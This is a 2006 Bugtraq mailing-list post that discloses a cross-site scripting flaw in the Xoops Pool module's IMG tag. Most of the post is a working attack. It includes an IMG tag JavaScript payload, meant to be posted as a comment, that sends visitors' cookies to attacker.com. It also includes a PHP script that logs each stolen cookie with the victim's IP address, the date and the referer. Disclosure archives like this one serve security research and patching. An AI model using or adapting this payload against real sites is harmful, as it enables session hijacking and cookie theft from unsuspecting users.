Bugtraq mailing list archives
Xoops Pool Module IMG Tag Cross Site Scripting
From: night_warrior771 () hotmail com
Date: 7 Jan 2006 10:08:21 -0000
##Night_Warrior<Kurdihs Hacker> ##night_warrior771[at]hotmail.com ##Xoops Pool Module IMG Tag Cross Site Scripting ##Contact :night_warrior771[at]hotmail.com Post Coment this Code: <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);" cookies.php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('steal.php', 'a'); fwrite($fp, ' Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' '); fclose($fp); ?>
Current thread:
- Xoops Pool Module IMG Tag Cross Site Scripting night_warrior771 (Jan 09)